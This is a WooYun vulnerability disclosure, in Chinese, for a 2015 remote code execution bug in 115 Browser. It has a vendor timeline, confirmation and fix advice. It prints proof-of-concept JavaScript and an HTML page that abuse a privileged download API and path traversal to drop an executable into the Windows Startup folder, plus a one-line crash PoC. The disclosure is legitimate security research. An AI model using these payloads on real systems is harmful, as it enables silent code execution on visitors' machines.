当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149968

漏洞标题:115浏览器远程代码执行漏洞

相关厂商:115网盘

漏洞作者: 隐形人真忙

提交时间:2015-10-28 11:00

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-22: 细节向核心白帽子及相关领域专家公开
2016-01-01: 细节向普通白帽子公开
2016-01-11: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

最新版本的115浏览器,分析内部接口时发现可以远程命令执行。

详细说明:

来看看最新的115浏览器:

1.png


2.png


--------------------------------------
0x00 远程命令执行
---------------------------------------
在主页中排查API的时候发现一个下载的API,在browserInterface里,调用格式如下:

function (urls, names, path) { 
native function NativeBatchDownloadFilesToLocal();
NativeBatchDownloadFilesToLocal(urls, names, path);
}


Urls为下载URL的列表,names为文件名,path为本地保存路径。
这个调用参数一看就是chrome://downloads域的文件下载功能的接口。
传入参数进行测试:

3.png


在下载路径下出现了文件:

4.png


但是看到这里的路径用的是默认路径,即:

5.png


尝试一下目录跳转,将path改为../test,发现在创建文件夹的时候去掉了特殊符号直接当做文件名本地创建,不存在跳转的逻辑。
而names参数可以用来控制文件名,那么使用这个参数控制跳转试试:

6.png


可以看到路径中将跳转符号包含进去了,来到下载目录看看,发现已经执行了跳转逻辑:

7.png


既然能够利用names参数和path参数联合进行跳转,那么不难写出POC:

window.browserInterface.BatchDownloadFilesToLocal(["http://127.0.0.1/calc.exe"], ["../../../exploitcat/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/calc.exe"],"test") ;


------------------------------------
0x01 任意域执行特权API
------------------------------------
拿到了命令执行的方法,下面找找特权域吧,经过测试115浏览器居然任意域都能执行特权API。这下连找XSS的步骤都省了。
随意一个页面:

<!DOCTYPE html>
<html>
<head>
</head>
<body>
115浏览器RCE测试
<script type="text/javascript">
browserInterface.BatchDownloadFilesToLocal(
["http://127.0.0.1/calc.exe"],
["../../../exploitcat/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/calc.exe"], "test2");
</script>
</body>
</html>


录制一个gif说明问题:
http://7xjb22.com1.z0.glb.clouddn.com/115browserRCE.gif
------------------------------------
0x02 赠送的DOS漏洞
------------------------------------
在测试中发现,敏感API中如果参数的类型出错会使浏览器崩溃,造成DOS漏洞。
POC如下:

browserInterface.BatchDownload("http://www.qq.com",null,null)


8.png


漏洞证明:

1、RCE
录制一个gif说明问题:
http://7xjb22.com1.z0.glb.clouddn.com/115browserRCE.gif
2、DOS

8.png

修复方案:

1、进行浏览器特权域的划分
2、修复下载接口的目录跳转漏洞
3、修复DOS漏洞,进行参数类型校验

版权声明:转载请注明来源 隐形人真忙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-28 14:31

厂商回复:

确认问题存在,感谢对115浏览器的支持,我们尽快修复!

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-28 11:13 | 牛 小 帅 ( 普通白帽子 | Rank:1003 漏洞数:232 | 1.乌云最帅的男人 ...)

    前排

  2. 2015-10-28 11:16 | 泳少 ( 普通白帽子 | Rank:233 漏洞数:81 | ★ 梦想这条路踏上了,跪着也要...)

  3. 2015-10-28 11:29 | 随风的风 ( 普通白帽子 | Rank:201 漏洞数:67 | 微信公众号:233sec 不定期分享各种漏洞思...)

  4. 2015-10-28 11:32 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:430 漏洞数:123 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

  5. 2015-10-28 14:48 | 隐形人真忙 ( 普通白帽子 | Rank:125 漏洞数:17 | Hello hacker!)

    :-( 敢不敢给20

  6. 2015-10-28 14:59 | 牛 小 帅 ( 普通白帽子 | Rank:1003 漏洞数:232 | 1.乌云最帅的男人 ...)

    @隐形人真忙 楼层被你打乱了

  7. 2015-11-03 11:06 | Sai、 ( 路人 | Rank:8 漏洞数:2 | for fun……)

    猫猫最近略凶猛啊

  8. 2015-11-03 11:12 | 隐形人真忙 ( 普通白帽子 | Rank:125 漏洞数:17 | Hello hacker!)

    @Sai、 hhhhhhhhhh 我也是闲的没事儿等毕业